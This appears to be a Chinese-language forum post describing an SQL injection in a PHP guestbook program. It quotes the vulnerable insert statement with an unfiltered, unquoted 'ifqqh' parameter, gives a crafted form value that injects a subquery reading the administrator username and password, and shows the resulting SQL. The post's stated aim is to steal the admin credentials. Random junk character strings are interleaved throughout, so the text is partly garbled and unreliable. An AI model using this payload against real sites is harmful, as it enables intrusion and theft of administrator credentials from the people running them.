留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。2 Z4 p2 }! S9 i- o7 f
9 @# ~1 d4 z! W. D, U; g7 e) R6 y$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。; K! B$ w1 `! Y1 L5 u7 _# K/ i
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
! c$ a. A5 d7 D5 K5 j* C
( s. |6 B7 ]! G6 T% V2 E提交的时候把ifqqh的值改一下。变成1 \" G( @$ \' ~3 f3 v6 V. | a/ L
$ l. \+ l- f9 e' C8 x3 ~<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />5 r& R2 ^; d) d
* l; e. d' O5 b8 c; ~
这样SQL插入语句就变了.
4 a) I! H J J* q( i
! [! u( L% a/ Z# s: Minsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
k7 K6 T1 a! V; N0 a' j
2 T \2 k- k: u" v构造了另外一句SQL。并且把帐号密码读出来。
! T& V, s( P: T2 b
6 \( n& T5 T2 T' q5 I9 |+ E' L. B |